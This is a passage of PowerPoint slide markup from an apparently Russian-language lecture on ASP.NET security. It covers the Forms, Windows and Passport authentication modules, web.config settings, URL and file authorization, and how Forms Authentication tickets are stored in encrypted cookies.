              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>и обрабатывают событие </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>HttpApplication.AuthenticateRequest. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Каждый модуль также инициирует свое собственное событие </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Authenticat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>у, обработку которого можно описать в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Gloabal.asax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t> файле. можно</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Конкретный модуль выбирается с помощью элемента </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>&lt;authentication&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>web.config </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>файле</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>корневой папки </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>приложения.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>ASP.NET предоставляет три базовых модуля аутентификации:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>FormsAuthenticationModule</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>WindowsAuthenticationModule</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>PassportAuthenticationModule</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2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ru-RU" smtClean="0"/>
              <a:t>Безопасность в</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> ASP.NET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5123" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1417638"/>
            <a:ext cx="8410575" cy="4371975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>ASP.NET provides security features in addition to those provided by IIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Oriented around client authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Several method available for integrating authentication into your pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Managed through web.config</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Accessing authenticated client information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>property of the Page class provides access to current client information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3898900" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" smtClean="0"/>
              <a:t>События безопасности</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41987" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="3827463" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>При поступлении каждого запроса к </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>приложению инициируется набор событий безопасности</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Можно создать обработчики этих событий в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Global.asax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Или написать свой </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>модуль</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41988" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4500563" y="260350"/>
            <a:ext cx="4354512" cy="62103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706437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t>ASP.Net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" smtClean="0"/>
              <a:t>методы аутентификации</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43011" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1268413"/>
            <a:ext cx="8229600" cy="4857750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Модуль FormsAuthenticationModule использует аутентификации с помощью форм, что позволяет разработчику создать свою собственную страницу подключения (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>login page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>и написать свою собственную логику аутентификации, но дать возможность </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>ASP.Net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>отслеживать информацию о пользователях и ролях с помощью шифрованных куки.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Данный модуль аутентификации становится активным, когда описан следующий элемент конфигурации</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>&lt;authentication mode="Forms" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Два других модуля аутентификации:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>&lt;authentication mode="Windows" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>&lt;authentication mode="Passport" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="240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229600" cy="850900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t>ASP.Net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" smtClean="0"/>
              <a:t> авторизация</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44035" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323850" y="1268413"/>
            <a:ext cx="8362950" cy="5400675"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>После аутентификации пользователя, информация о нем, такая как  имя контекст безопасности  (security context) автоматически становится доступной ASP.NET инфраструктуре. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>Можно получить доступ к этой информацию с помощью объекта HttpContext.Current.User и использовать ее для реализации авторизации в своем коде. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>ASP.NET включает следующие заранее разработанные модули для реализации авторизации:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" smtClean="0"/>
              <a:t>UrlAuthorization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>: данный модуль основывается на содержании элемента &lt;authorization&gt; конфигурационного файла web.config в различных папках web приложения. Он может ограничить доступ к папкам и файлам на основе имени или ролей пользователя..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" smtClean="0"/>
              <a:t>FileAuthorization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>: при использовании Windows аутентифкации в интранет, ASP.NET автоматически использует модуль FileAuthorization для авторизации доступа пользователей Windows на основе Windows ACL (списков доступа). В этом случае, пользователи Windows должнны иметь, по крайней мере, права на чтение (read access rights) файлов , составляющих web приложение. Этот модуль работает только с Windows аутентификацией – но без персонификации.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>Кроме этого можно реализовать авторизацию с помощью своего кода в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>страницах или компонентах, которые используются web приложением. В этом случае используется объект HttpContext.Current.User и принимается решение на основе членства в ролях (role membership) или непосредственно на основе имени пользователя.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ru-RU" sz="4000" smtClean="0"/>
              <a:t>Авторизация и роль </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="4000" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" smtClean="0"/>
              <a:t>(Authorization and Roles)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45059" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Авторизация это процесс определения того, имеет ли пользователь достаточно прав для выполнения требуемого действия (получения </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>страницы, получения доступа к ресурсу, контролируемому ОС), выполнение специфической для приложения задачи (например, размещение заказа)).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="1" smtClean="0"/>
              <a:t>URL Authorization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t> – наиболее простой способ задать разрешения безопасности на конкретную </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>страницу, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>сервис, или поддиректорию. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>ASP.Net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>поддерживает декларативные правила авторизации, которые задаются в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>web.config.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2400" smtClean="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395288" y="2781300"/>
            <a:ext cx="8229600" cy="935038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" smtClean="0"/>
              <a:t>Основы </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t>Forms Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="40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922337"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" smtClean="0"/>
              <a:t>Основы </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t>Forms Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="4000" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47107" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1268413"/>
            <a:ext cx="8229600" cy="5329237"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Данный способ основан на билетах (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>ticket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t> или </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>token)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Когда пользователи подключаются, они получают билет (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>ticket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>с основной информацией о пользователе. Эта информация сохраняется в шифрованном куки, который прикрепляется к ответу на запрос, и таким образом передается с каждым последующим запросом.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Когда пользователь запрашивает </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>страницу, которая не доступна анонимному пользователю, то </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>ASP.Net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>проверяет наличие билета. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Если его нет, то </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>ASP.Net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>автоматически перенаправляет пользователя на странице подключения (login page). Программист должен создать такую страницу и проверить данные занесенные пользователем на странице подключения. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Если данные успешно пройдут проверку, то нужно сообщить инфраструктуре </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>ASP.Net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>об успехе (вызвав метод класса FormsAuthentication) и среда автоматически задаст значения для куки аутентификации (который реально содержит билет - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>ticket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>и перенаправит пользователя на ранее запрашиваемую страницу. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>При обработке этого запроса среда определит, что куки аутентификации с </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>ticket </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>доступен.</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
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect l="22688" t="18512" r="27849" b="9636"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1331913" y="333375"/>
            <a:ext cx="5989637" cy="65246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ru-RU" sz="3600" smtClean="0"/>
              <a:t>Достоинства</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49155" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Используется, если есть причины не использовать в приложении учетные записи </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Достоинства использования </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Form Authentication</a:t>
            </a:r>
